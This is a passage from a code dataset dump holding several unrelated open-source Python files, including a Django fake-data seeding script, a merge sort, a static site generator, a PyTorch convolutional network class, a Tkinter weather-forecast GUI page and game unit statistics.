csv.DictReader(f)\n for dct in r:\n work_list.append(dct)\n f.close()\n\n''' Lendo os dados de clientes_.csv '''\nwith open('fix/clientes_.csv', 'r') as f:\n r = csv.DictReader(f)\n for dct in r:\n customer_list.append(dct)\n f.close()\n\n''' Lendo os dados de enderecos_.csv '''\nwith open('fix/enderecos_.csv', 'r') as f:\n r = csv.DictReader(f)\n for dct in r:\n address_list.append(dct)\n f.close()\n\nif not Occupation.objects.all().count():\n obj = [Occupation(occupation=val) for val in OCCUPATION_LIST]\n Occupation.objects.bulk_create(obj)\n\nphoto = 'http://icons.iconarchive.com/icons/icons-land/vista-people/256/Office-Customer-Male-Light-icon.png'\n\nif not Person.objects.all().count():\n for i in range(25):\n occupation_id = random.randint(1, 8)\n occupation = Occupation.objects.get(pk=occupation_id)\n g = random.choice(['M', 'F'])\n if g == 'M':\n treatment = gen_male_first_name()['treatment']\n first_name = gen_male_first_name()['first_name']\n else:\n treatment = gen_female_first_name()['treatment']\n first_name = gen_female_first_name()['first_name']\n last_name = names.get_last_name()\n company = random.choice(COMPANY_LIST)\n cpf = gen_cpf()\n rg = gen_rg()\n slug = slugify('{} {}'.format(first_name, last_name))\n email = first_name[0].lower() + '.' + \\\n last_name.lower() + '@example.com'\n obj = Person(\n person_type='p',\n gender='M',\n treatment=treatment,\n first_name=first_name,\n last_name=last_name,\n slug=slug,\n photo=photo,\n company=company,\n occupation=occupation,\n email=email,\n cpf=gen_cpf(),\n rg=gen_rg(),\n address=address_list[i]['address'],\n district=address_list[i]['district'],\n city=address_list[i]['city'],\n uf=address_list[i]['uf'],\n cep=address_list[i]['cep'],\n )\n obj.save()\n\n\nif not Customer.objects.all().count():\n for i in range(len(customer_list)):\n g = random.choice(['M', 'F'])\n if g == 'M':\n treatment = gen_male_first_name()['treatment']\n first_name = gen_male_first_name()['first_name']\n else:\n treatment = gen_female_first_name()['treatment']\n first_name = gen_female_first_name()['first_name']\n last_name = names.get_last_name()\n email = first_name[0].lower() + '.' + \\\n last_name.lower() + '@example.com'\n slug = slugify('{} {}'.format(first_name, last_name))\n obj = Customer(\n person_type='c',\n gender='M',\n treatment='sr',\n first_name=first_name,\n last_name=last_name,\n slug=slug,\n company=random.choice(COMPANY_LIST),\n email=email,\n customer_type=customer_list[0]['customer_type'],\n cpf=gen_cpf(),\n rg=gen_rg(),\n cnpj=gen_digits(14),\n ie='isento',\n address=address_list[i]['address'],\n district=address_list[i]['district'],\n city=address_list[i]['city'],\n uf=address_list[i]['uf'],\n cep=address_list[i]['cep'],\n )\n obj.save()\n\n\nREPEAT = len(work_list)\n\nfor i in range(REPEAT):\n # obtem todos os pk de contatos\n person_pks = [pk[0] for pk in Person.objects.all().values_list('pk')]\n p = choice(person_pks)\n person = Person.objects.get(pk=p)\n # obtem todos os pk de clientes\n customer_pks = [pk[0] for pk in Customer.objects.all().values_list('pk')]\n c = choice(customer_pks)\n customer = Customer.objects.get(pk=c)\n obj = Work(\n name_work=work_list[i]['name_work'],\n slug=work_list[i]['slug'],\n person=person,\n customer=customer,\n address=address_list[i]['address'],\n district=address_list[i]['district'],\n city=address_list[i]['city'],\n uf=address_list[i]['uf'],\n cep=address_list[i]['cep'],\n )\n try:\n obj.save()\n except IntegrityError:\n print('Registro existente.')\n\n\n# ------------ Entry -------------------------\npriority_list = (URGENTE, ALTA, NORMAL, BAIXA)\n\n\n# Return min id of work\ntry:\n min_work_pk = Work.objects.order_by('pk')[0].pk\nexcept IndexError:\n min_work_pk = None\n\n\n# Return max id of work\ntry:\n max_work_pk = Work.objects.latest('pk').id\nexcept Work.DoesNotExist:\n max_work_pk = None\n\n\nREPEAT = max_work_pk + 1\n\nfor i in range(min_work_pk, REPEAT):\n priority = choice(priority_list)\n work = Work.objects.get(pk=i)\n # obtem todos os pk de contatos\n person_pks = [pk[0] for pk in Person.objects.all().values_list('pk')]\n p = choice(person_pks)\n person = Person.objects.get(pk=p)\n # obtem todos os pk de vendedores\n seller_pks = [pk[0] for pk in Seller.objects.all().values_list('pk')]\n c = choice(seller_pks)\n seller = Seller.objects.get(pk=c)\n description = gen_string(30)\n obj = Entry(\n priority=priority,\n work=work,\n person=person,\n description=description,\n seller=seller,\n )\n obj.save()\n\n\n# done\n","repo_name":"rg3915/orcamentos","sub_path":"shell/shell_entry.py","file_name":"shell_entry.py","file_ext":"py","file_size_in_byte":8909,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"69"}
+{"seq_id":"36593322567","text":"def merge_sort(arr):\n \"\"\"\n Implements the recursive merge sort algorithm:\n\n 1. If array has >= 2 elements, split the arr as evenly as possible\n 2. Perform merge sort on the child elements\n 3. Merge the results into a sorted list\n\n :return:\n \"\"\"\n\n if len(arr) in {0, 1}:\n return arr\n\n else:\n # Split the array into two\n pivot = len(arr) // 2\n\n arr1 = [arr[k] for k in range(0, pivot)]\n arr2 = [arr[k] for k in range(pivot, len(arr))]\n\n return merge(merge_sort(arr1), merge_sort(arr2))\n\n\ndef merge(arr1, arr2):\n \"\"\"\n Helper function that merges two (sorted) arrays by iterating over them at the same time and popping the minimum\n element at the head of either array to the output array\n\n :param arr1:\n :param arr2:\n :return:\n \"\"\"\n\n out = []\n i = j = 0\n\n # Now merge\n while (i + j) < len(arr1) + len(arr2):\n\n if j == len(arr2) or (i < len(arr1) and arr1[i] < arr2[j]):\n out.append(arr1[i])\n i += 1\n else:\n out.append(arr2[j])\n j += 1\n\n return out","repo_name":"qichaozhao/cs50","sub_path":"py_sorts/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23420271641","text":"# importing module\nimport random\n\nnumber = random.randint(0, 5)\nguessing = 0\n\nwhile guessing < 3:\n player = int(input(\"Enter Your Guess : \"))\n if player == number:\n print(\"Your Guess is right\")\n break\n else:\n print(\"Your guess is wrong\")\n guessing += 1\n\nprint(\"Your Game has ended\")\nprint(\"The guess number is \" + str(number))","repo_name":"shreyansh-sawarn/Hacktoberfest","sub_path":"Python/guessnumber.py","file_name":"guessnumber.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"37349554320","text":"# 数据集,可根据需要增加英文或其它字符\r\n\r\nSETS = [str(i) for i in range(10)] + \\\r\n [chr(ord('a')+i) for i in range(0, 26)] + \\\r\n [chr(ord('A')+i) for i in range(0, 26)] + \\\r\n [',', '.', '?', ';', '\"', '[', ']', '{', '}',\r\n '`', '~', '!', '@', '#', '$', '%', '^', '&',\r\n '*', '(', ')', '-', '=', '_', '+', '|', '\\\\',\r\n '/', '<', '>', ':', \"'\"]\r\n\r\n# 分类数量\r\nnum_classes = len(SETS) + 1 # 数据集字符数+特殊标识符\r\n\r\n# 图片大小,32 x 256\r\nOUTPUT_SHAPE = (32, 256)\r\n\r\n# 学习率\r\nINITIAL_LEARNING_RATE = 1e-3\r\nDECAY_STEPS = 5000\r\nREPORT_STEPS = 100\r\nLEARNING_RATE_DECAY_FACTOR = 0.9\r\nMOMENTUM = 0.9\r\n\r\n# LSTM网络层次\r\nnum_hidden = 128\r\nnum_layers = 2\r\n\r\n# 训练轮次、批量大小\r\nnum_epochs = 50000\r\nBATCHES = 10\r\nBATCH_SIZE = 32\r\nTRAIN_SIZE = BATCHES * BATCH_SIZE\r\n\r\n# 数据集目录、模型目录\r\ndata_dir = \"/tmp/lstm_ctc_data/\"\r\nmodel_dir = \"/tmp/lstm_ctc_model/\"","repo_name":"DemonXD/AIOHttp-enhancOCR","sub_path":"torch/lstm_ctc/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16596728750","text":"'''\n1. 행렬 경로의 이동상의 규칙을 다음과 같이 적용한다 하자. \n\n- 오른쪽이나 아래쪽, 또는 오른쪽 대각선으로만 이동할 수 있다. (=> 오른쪽 하단만 해당한다고 여김)\n- 왼쪽, 위쪽으로의 이동과 여타의 대각선 이동은 허용하지 않는다.\n\nn x n 행렬의 왼쪽 위(1,1) 에서 시작해 오른쪽 아래(n,n)까지 한 칸씩 이동하여 도달할 때 \n모든 경로의 점수 중 가장 높은 점수를 찾는 동적 프로그래밍 알고리즘을 작성하시오.\n\n------------------------------------------------------------------------------------\n행렬과 같은 크기의 DP 배열의 각 칸 안에 \n해당 칸까지 규칙을 따라 갔을 때 얻을 수 있는 최고점을 저장한다. (메모이제이션)\n해당 칸보다 더 도착지에 가까워지도록 문제를 확장할 때에는 거기에서 불러와서 쓴다.\n문제가 정사각형 형태이기 때문에 1*1 => 2*2로 확장할 수 있어서 왼쪽, 위, 왼쪽대각선을 보면 됨.\n'''\nimport sys\n\nN = int(sys.stdin.readline()) #행렬 사이즈\n\nboard = [] \n\nfor i in range(N): # 보드 구성\n temp = list(map(int, sys.stdin.readline().split())) \n board.append(temp)\n\ndp = [] # dp 초기화\nfor i in range(N): \n dp.append([])\n for j in range(N):\n dp[i].append(0)\n\nfor i in range(N): # i는 행\n for j in range(N): #j는 열\n val = board[i][j]\n left = 0\n up = 0\n cross = 0\n if i-1 >= 0:\n up = dp[i-1][j]\n if j-1 >= 0:\n left = dp[i][j-1]\n if i-1 >= 0 and j-1 >= 0:\n cross = dp[i-1][j-1]\n\n dp[i][j] = val+max(up, left, cross)\n\nprint(dp[N-1][N-1])","repo_name":"S00ahKim/programmers","sub_path":"way_to_go.py","file_name":"way_to_go.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35154952666","text":"__author__ = \"Patrick Nicolas\"\n__copyright__ = \"Copyright 2020, 2022 All rights reserved.\"\n\nimport torch\nfrom util.plottermixin import PlotterMixin\nfrom models.nnet.neuralnet import NeuralNet\nfrom models.cnn.convmodel import ConvModel\nfrom models.cnn.convneuralblock import ConvNeuralBlock\nfrom models.nnet.hyperparams import HyperParams\nfrom torch.utils.data import Dataset, DataLoader\n\n\n\"\"\"\n Configurable convolutional neural network. \n - A convolutional neural network is composed of neural block\n - Each block is composed of Convolution, Batch normalization, activation, max pooling and optionally a \n dropout module\n This class inherits from \n - NeuralNet for training and evaluation\n - PlotterMixin for displaying \n \n :param conv_vae_model: Convolutional Neural Network encoder_model or layout as a composition of Neural blocks\n :type conv_vae_model: cnn.convnetmodel.ConvNetModel\n :param hyper_params: Training (hyper) parameters used for tuning\n :type hyper_params: nnet.hyperparams.HyperParams\n :param debug: Transform the label input_tensor prior to loss function (encoder, labels) -> converted labels\n :type debug: (list[torch.Tensor], list[torch.Tensor]) -> torch.Tensor\n :param post_epoch_func:\n\"\"\"\n\n\nclass ConvNet(NeuralNet, PlotterMixin):\n def __init__(self,\n conv_net_model: ConvModel,\n hyper_params: HyperParams,\n debug):\n super(ConvNet, self).__init__(hyper_params, debug)\n self.conv_net_model = conv_net_model\n\n @classmethod\n def init(cls, config, conv_net_model: ConvModel, loss_func: torch.nn.Module, debug):\n \"\"\"\n Alternative constructor for hyper-parameters tuning\n :param config: Ray tune config\n :param conv_net_model: Convolutional model\n :param loss_func: Loss function\n :param debug:\n :returns: instance of Neural net\n \"\"\"\n hyper_params = HyperParams(config['learning-rate'], config['momentum'], 30, config['batch_size'], 10.0, loss_func)\n return ConvNet(conv_net_model, hyper_params, debug)\n\n def apply_debug(self, features: list, labels: list, title: str):\n \"\"\"\n Apply a debug information related to the list of encoder (for debugging purpose)\n :param features: list of encoder\n :param labels: List of labels\n :param title: Title or description of the debugging info\n \"\"\"\n if self._debug is not None:\n self._debug(features, labels, title)\n\n def model_label(self) -> str:\n return self.conv_net_model.model_label()\n\n def train_and_eval(self, dataset: Dataset):\n \"\"\"\n Training and evaluation of a given encoder_model, conv_vae_model, with a given set of the hyper-parameters\n :param dataset: Data set (encoder, labels) used for training\n \"\"\"\n NeuralNet.train_and_eval(self, dataset, self.conv_net_model)\n\n\n def train_then_eval(self, train_loader: DataLoader, test_loader: DataLoader):\n \"\"\"\n Training and evaluation of a given encoder_model, conv_vae_model, with a given set of the hyper-parameters\n :param train_loader Data loader for the training data\n :param test_loader Data loader for the evaluation data\n \"\"\"\n NeuralNet.train_then_eval(self, train_loader, test_loader, self.conv_net_model)\n\n def __repr__(self):\n return f'Convolutional encoder_model:\\n{repr(self.conv_net_model)}\\nHyper-parameters:\\n{repr(self.hyper_params)}'\n\n def __str__(self):\n return self.__repr__()\n\n @staticmethod\n def feature_extractor(\n model_id: str,\n dim: int,\n in_channels: int,\n hidden_dim: int,\n out_channels: int,\n params: list) -> ConvModel:\n \"\"\"\n Static method to generate a convolutional neural model with increasing number\n of input_tensor/output channels ( * 2). This convolutional model does not have connected layer\n The convolutional parameters are: kernel_size, stride, padding, batch_norm, activation.\n :param model_id: Dimension of the convolution\n :param dim: Dimension of the convolution (1 time series, 2 images, 3 video..)\n :param in_channels: Size of the latent space\n :param hidden_dim: Size of the intermediate blocks\n :param out_channels: Number of output channels\n :param params: List of convolutional parameters {kernel_size, stride, padding, batch_norm, max_pooling_kernel, activation}\n \"\"\"\n assert in_channels > 0, f'z_dim {in_channels} should be > 0'\n assert hidden_dim > 1, f'hidden_dim {hidden_dim} should be > 1'\n assert out_channels > 0, f'output_dim {out_channels} should be > 0'\n assert len(params) > 1, f'Number of parameters for cascading blocks {len(params)} should be > 1'\n assert len(params[0]) == 6, f'Size of parameters {len(params[0])} should be 6'\n\n in_size = in_channels\n num_conv_params = len(params)\n out_size = hidden_dim\n blocks = []\n\n # Iteratively generate Convolution neural blocks\n for index in range(num_conv_params):\n kernel_size, stride, padding, batch_norm, max_pooling_kernel, activation = params[index]\n new_block = ConvNeuralBlock(\n dim,\n in_size,\n out_size,\n kernel_size,\n stride,\n padding,\n batch_norm,\n max_pooling_kernel,\n activation,\n False,\n False)\n blocks.append(new_block)\n in_size = out_size\n out_size = out_channels if index == num_conv_params - 2 else out_size * 2\n\n # Finally assemble the Convolutional model\n model = ConvModel.build(model_id, dim, blocks, None)\n del blocks\n return model\n","repo_name":"patnicolas/Neural_architecture","sub_path":"models/cnn/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74166764379","text":"import argparse\nimport logging\nimport os\nimport os.path as osp\nimport posixpath\nimport shutil\nimport stat\nimport sys\n\nimport jinja2\n\nimport rsitegen.conf\nfrom rsitegen.conf import config\n#import rsitegen.plugins\nfrom rsitegen.node import *\nimport rsitegen.templates as templates\nimport rsitegen.util\n\nlogger = logging.getLogger()\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"rsitegen: Static site generator\")\n\n parser.add_argument(\"src\", nargs='?', help=\"Source directory (SOURCEDIR)\")\n parser.add_argument(\"dest\", nargs='?', help=\"Output directory (DESTDIR)\")\n parser.add_argument(\"-c\", \"--config\", help=\"Configuration file to use\")\n parser.add_argument('-D', \"--debug\", action=\"store_true\", default=False,\n help=\"Debug mode\")\n\n args = parser.parse_args()\n\n assert args.debug is not None\n config[\"DEBUG\"] = args.debug\n if args.debug:\n logger.setLevel(logging.DEBUG)\n\n if args.src is not None:\n config[\"SOURCEDIR\"] = args.src\n\n if args.dest is not None:\n config[\"DESTDIR\"] = args.dest\n\n return args\n\n\ndef init_config():\n required = (\"SOURCEDIR\", \"DESTDIR\")\n args = parse_arguments()\n if args.config is not None:\n config_file = args.config\n else:\n config_file = \"siteconf.py\"\n\n config.load_config_file(config_file)\n\n for req in required:\n if req not in config:\n logger.critical(req + \" must be provided in the configuration file\"\n \" or on the command line.\")\n sys.exit(1)\n\n\ndef init_logger():\n logger.addHandler(logging.StreamHandler())\n\n\ndef get_dir_template(dirpath, filenames):\n for template in config[\"DIRINDEX_TEMPLATES\"]:\n if template in filenames:\n return osp.join(dirpath, template)\n\n return util.get_theme_template(\"directory\")\n\n\ndef render_all(root, path='/'):\n cur = root\n logger.debug(\"Rendering directory %s (%s)\", path, type(root).__name__)\n root.render(root, path)\n for name,child in root.children.items():\n childpath = posixpath.join(path, name)\n if isinstance(child, DirNode):\n render_all(child, childpath)\n else:\n logger.debug(\"Rendering %s (%s)\", childpath,\n type(child).__name__)\n child.render(root, childpath)\n\n\ndef main():\n init_logger()\n init_config()\n for k,v in config.items():\n logger.debug('config[\"' + k + '\"]=' + str(v))\n\n jinja_env = templates.init_env()\n\n parent = None\n root = None\n for dirpath,dirnames,filenames in os.walk(config[\"SOURCEDIR\"]):\n #logger.debug(\"Processing directory %s\", dirpath)\n rel_dirpath = osp.relpath(dirpath, config[\"SOURCEDIR\"])\n if rel_dirpath == '.':\n rel_dirpath = ''\n curdir = DirNode(rel_dirpath, parent, osp.basename(rel_dirpath), jinja_env,\n get_dir_template(dirpath, filenames))\n if root is None:\n root = curdir\n parent = curdir\n\n for f in filenames:\n path = osp.join(dirpath, f)\n relpath = osp.join(rel_dirpath, f)\n #logger.debug(\"Processing file %s\", path)\n # if osp.islink(path):\n # node = LinkNode(relpath, os.readlink(path))\n # continue\n\n splitext = osp.splitext(f)\n base = splitext[0]\n ext = splitext[1].lstrip('.')\n if ext in config[\"PAGE_EXTENSIONS\"]:\n node = PageNode(relpath, jinja_env)\n name = base + \".html\"\n elif ext in config[\"TEMPLATE_EXTENSIONS\"]:\n node = TemplateNode(relpath, jinja_env, path)\n name = base\n else:\n node = FileCopyNode(relpath)\n name = f\n\n curdir.add_child(name, node)\n\n render_all(root)\n\n assets_src = osp.join(config[\"THEME\"], \"assets\")\n assets_dest = osp.join(config[\"DESTDIR\"],\n config[\"THEME_ASSETS_PATH\"].lstrip(osp.sep))\n\n if os.path.isdir(assets_src):\n copied = False\n while not copied:\n try:\n shutil.copytree(assets_src, assets_dest)\n copied = True\n except FileExistsError:\n if not stat.S_ISDIR(os.lstat(assets_dest).st_mode):\n os.unlink(assets_dest)\n else:\n shutil.rmtree(assets_dest)\n","repo_name":"Frogging101/rsitegen","sub_path":"rsitegen/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11442855534","text":"import unittest\nimport random\nimport time\nfrom common import S_Log\nimport HTMLTestRunner\nfrom common import readConfig\nimport os\nimport datetime\nfrom common import mail\n\nreport_path = os.path.join(os.getcwd(), \"relust\")\ntestCase_path = os.path.join(os.getcwd(), 'testCase')\ndata = readConfig.readconfig().get_Xml_testName()\nlogger=S_Log.LogClass()\n\n\nclass Alltest:\n\n def test_setSuiteCase(self):\n print(data)\n print(testCase_path)\n test_suit = unittest.TestSuite()\n suite = []\n for case in data:\n print(case)\n discover = unittest.defaultTestLoader.discover(testCase_path, pattern=case + '.py', top_level_dir=None)\n suite.append(discover)\n\n for value in suite:\n test_suit.addTest(value)\n\n return test_suit\n\n\n def run_test(self):\n suit=self.test_setSuiteCase()\n id=str(random.randint(2000,9999))\n try:\n report_abspath = os.path.join(report_path, \"result\"+str(datetime.datetime.now().year)+str(datetime.datetime.now().month)+id+\".html\")\n fp = open(report_abspath, \"wb\")\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp,\n title=u'自动化测试报告,测试结果如下:',\n description=u'用例执行情况:')\n runner.run(suit)\n time.sleep(10)\n mail.configMail().send(\"result\"+str(datetime.datetime.now().year)+str(datetime.datetime.now().month)+id)\n except Exception as ex:\n logger.log_info(ex)\n\n # @parameterized.parameterized.expand(data)\n # def testRun(self,modelName):\n # path=os.path.join(os.getcwd(),'testCase\\\\'+str(modelName)+'')\n # print(path)\n # all_cases = unittest.defaultTestLoader.discover(path, pattern='l*.py')\n # report_abspath = os.path.join(report_path, \"result.html\")\n # fp = open(report_abspath, \"wb\")\n # runner = HTMLTestRunner.HTMLTestRunner(stream=fp,\n # title=u'自动化测试报告,测试结果如下:',\n # description=u'用例执行情况:')\n # runner.run(all_cases)\nif __name__ == '__main__':\n Alltest().run_test()","repo_name":"chenmolv/SPF_API","sub_path":"runAll.py","file_name":"runAll.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7466642861","text":"from __future__ import absolute_import, unicode_literals\n\nfrom collections import namedtuple\n\nfrom groove import utils\nfrom groove._groove import ffi, lib\nfrom groove.groove import GrooveClass\n\n__all__ = [\n 'LoudnessDetector',\n 'LoudnessDetectorInfo',\n]\n\n\nLoudnessDetectorInfo = namedtuple('LoudnessDetectorInfo', [\n 'loudness',\n 'peak',\n 'duration',\n 'playlist_item',\n])\n\n\nclass LoudnessDetector(GrooveClass):\n \"\"\"pass\"\"\"\n _ffitype = 'struct GrooveLoudnessDetector *'\n\n info_queue_size = utils.property_convert('info_queue_size', int,\n doc=\"\"\"Maximum number of items to store in this LoudnessDetector's\n queue\n\n This defaults to MAX_INT, meaning that the loudness detector will cause\n the decoder to decode the entire playlist. If you want to instead, for\n example, obtain loudness info at the same time as playback, you might\n set this value to 1.\n \"\"\")\n\n sink_buffer_size = utils.property_convert('sink_buffer_size', int,\n doc=\"\"\"How big the sink buffer should be, in sample frames\n\n LoudnessDetector defaults this to 8192\n \"\"\")\n\n disable_album = utils.property_convert('disable_album', bool,\n doc=\"\"\"Set True to only compute track loudness\n\n This is faster and requires less memory than computing both.\n LoudnessDetector defaults this to False\n \"\"\")\n\n @property\n def playlist(self):\n \"\"\"Playlist to generate loudness info for\"\"\"\n return self._playlist\n\n @playlist.setter\n def playlist(self, value):\n if self._playlist:\n assert lib.groove_loudness_detector_detach(self._obj) == 0\n self._playlist = None\n\n if value is not None:\n assert lib.groove_loudness_detector_attach(self._obj, value._obj) == 0\n self._playlist = value\n\n def __init__(self):\n # TODO: error handling\n obj = lib.groove_loudness_detector_create()\n assert obj != ffi.NULL\n self._obj = ffi.gc(obj, lib.groove_loudness_detector_destroy)\n self._playlist = None\n\n def __del__(self):\n # Make sure playlist gets detached before we loose the obj\n if self.playlist is not None:\n self.playlist = None\n\n def __iter__(self):\n info_obj = ffi.new('struct GrooveLoudnessDetectorInfo *');\n pitem = True\n\n while pitem:\n status = lib.groove_loudness_detector_info_get(self._obj, info_obj, True)\n assert status >= 0\n if status != 1:\n break\n\n loudness = float(info_obj.loudness)\n peak = float(info_obj.peak)\n duration = float(info_obj.duration)\n\n if info_obj.item == ffi.NULL:\n pitem = None\n else:\n pitem = self.playlist._pitem(info_obj.item)\n\n yield LoudnessDetectorInfo(loudness, peak, duration, pitem)\n\n def info_peek(self, block=False):\n \"\"\"Check if info is ready\"\"\"\n result = lib.groove_loudness_detector_info_peek(self._obj, block)\n assert result >= 0\n return bool(result)\n\n def position(self):\n \"\"\"Get the current position of the printer head\n\n Returns:\n A tuple of (playlist_item, seconds). If the playlist is empty\n playlist_item will be None and seconds will be -1.0\n \"\"\"\n pitem_obj_ptr = ffi.new('struct GroovePlaylistItem **')\n seconds = ffi.new('double *')\n lib.groove_loudness_detector_position(self._obj, pitem_obj_ptr, seconds)\n if pitem_obj_ptr[0] == ffi.NULL:\n pitem = None\n else:\n pitem = self.playlist._pitem(pitem_obj_ptr[0])\n return pitem, float(seconds[0])\n","repo_name":"kalhartt/python-groove","sub_path":"src/groove/loudness.py","file_name":"loudness.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"43127265388","text":"# importing standard modules \nimport requests\nimport subprocess\nimport sys\nimport tkinter as tk\nfrom tkinter import messagebox\n\n# set color scheme and font\nfrom color_schemes import color_scheme\ngui_color=color_scheme(1) # 1=default\n\ndef check_internet():\n url='http://www.google.com/'\n timeout=5\n try:\n _ = requests.get(url, timeout=timeout)\n return True\n except requests.ConnectionError:\n return False\n\nclass StartPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.configure(bg=gui_color[0])\n screenwidth=self.winfo_screenwidth() #get the current screen width\n screenheight=self.winfo_screenheight() #current height of screen\n subprocess.call('convert /pi-wrf/WRF_System/lib/start_page_bg.jpg -resize {}x{}\\! '\n ' /pi-wrf/WRF_System/lib/start_page_bg.gif'\\\n .format(screenwidth,screenheight),\n shell=True)\n photo=tk.PhotoImage(file='/pi-wrf/WRF_System/lib/start_page_bg.gif')\n\n # configuring layout of widgets\n self.grid_columnconfigure(0,weight=4)\n self.grid_rowconfigure(0,weight=1)\n self.grid_rowconfigure(1,weight=3)\n self.grid_rowconfigure(2,weight=1)\n self.grid_rowconfigure(3,weight=3)\n self.grid_rowconfigure(4,weight=1)\n \n # background label\n bg_lbl = tk.Label(self,image=photo)\n bg_lbl.image = photo\n bg_lbl.place(x=0,y=0,relwidth=1,relheight=1)\n\n # header label\n header_lbl = tk.Label(self,\n bg=gui_color[1],\n font=('Arial Bold',40),\n text='Welcome to the Raspberry Pi-WRF Application')\n header_lbl.grid(column=0,columnspan=3,sticky='new')\n \n # run forecast button\n from Pages.page_one import PageOne #located here to prevent circular imports\n run_fcst_btn = tk.Button(self,\n text='Run Forecast',\n font=('Arial Bold',40),\n borderwidth=5,bg=gui_color[2],\n activebackground=gui_color[3],\n width=20,\n command=lambda : [controller.show_frame(PageOne),check_internet()])\n run_fcst_btn.grid(row=1,sticky='s') \n if check_internet():\n run_fcst_btn.config(command=lambda : [controller.show_frame(PageOne)])\n else:\n run_fcst_btn.config(command=lambda : [messagebox.showwarning('Warning', 'No network connection detected. '\n 'cannot run live simulation. Please exit application and check connection.')])\n # archived sim button\n arc_sim_btn = tk.Button(self,\n text='Run Archived Simulation',\n font=('Arial Bold',40),\n borderwidth=5,\n bg=gui_color[2],\n activebackground=gui_color[3],\n width=20,\n command=lambda : tk.messagebox.showwarning('Warning', \n 'Archived Simulations Are Not Yet Available'))\n arc_sim_btn.grid(row=2)\n \n # exit button\n exit_btn = tk.Button(self,\n text='Exit',\n font=('Arial Bold',40),\n borderwidth=5,bg=gui_color[2],\n activebackground=gui_color[3],\n width=20,\n command=lambda : controller.quit_app())\n exit_btn.grid(row=3,sticky='n')\n\n # version label\n version_lbl = tk.Label(self,\n text=('Pi-WRF Version 1.2.0'),\n anchor='w',\n font=('Arial Bold',5),\n fg='black',\n bg=gui_color[1])\n version_lbl.grid(row=4,sticky='sew')\n","repo_name":"ClimateChangeXplorers/pi-wrf","sub_path":"src/pi-wrf/Pages/start_page.py","file_name":"start_page.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"40059266585","text":"from gameobjects.units.gameunit import UnitType\nfrom util.constants import Constants\n\n\nclass UnitInfo:\n \"\"\"\n A class documenting all the stats of the units\n Stats are om the following order: [maxhealth, attack, speed, availableattacks, range, cost]\n \"\"\"\n # SOLDIER UNITS\n spearman = {\n \"name\": \"spearman\",\n \"type\": UnitType.SOLDIER,\n \"stats\": [2, 2, 3, 1, 1, 2],\n \"requiredunit\": \"armory\",\n \"buildable\": True,\n \"description\": \"Completely broken\"\n }\n footman = {\n \"name\": \"footman\",\n \"type\": UnitType.SOLDIER,\n \"stats\": [2, 1, 2, 1, 1, 1],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Ole reliable\"\n }\n archer = {\n \"name\": \"archer\",\n \"type\": UnitType.SOLDIER,\n \"stats\": [1, 1, 2, 1, 2, 1],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"RUSH RUSH RUSH\"\n }\n # BUILDING UNITS\n village = {\n \"name\": \"village\",\n \"type\": UnitType.BUILDING,\n \"stats\": [6, 0, 0, 0, 0, 0],\n \"requiredunit\": None,\n \"buildable\": False,\n \"description\": \"Don\\'t let this die\"\n }\n goldmine = {\n \"name\": \"gold mine\",\n \"type\": UnitType.BUILDING,\n \"stats\": [3, 0, 0, 0, 0, 7],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Produces \" + str(Constants.GOLDMINE_PRODUCTION) + \" gold a turn each\"\n }\n farm = {\n \"name\": \"farm\",\n \"type\": UnitType.BUILDING,\n \"stats\": [3, 0, 0, 0, 0, 4],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Expands unit cap by \" + str(Constants.FARM_UNIT_EXPANSION)\n }\n armory = {\n \"name\": \"armory\",\n \"type\": UnitType.BUILDING,\n \"stats\": [3, 0, 0, 0, 0, 5],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Allows production of spearmen\"\n }\n magetower = {\n \"name\": \"mage tower\",\n \"type\": UnitType.BUILDING,\n \"stats\": [4, 2, 0, 1, 2, 6],\n \"requiredunit\": None,\n \"buildable\": True,\n \"description\": \"Immobile and tanky defense building\"\n }\n\n # in no particular order\n allUnitInfo = {\n \"spearman\": spearman,\n \"footman\": footman,\n \"archer\": archer,\n \"village\": village,\n \"gold mine\": goldmine,\n \"farm\": farm,\n \"armory\": armory,\n \"mage tower\": magetower\n }","repo_name":"jerukan/Conquest","sub_path":"conquest/gameobjects/units/unit_info.py","file_name":"unit_info.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
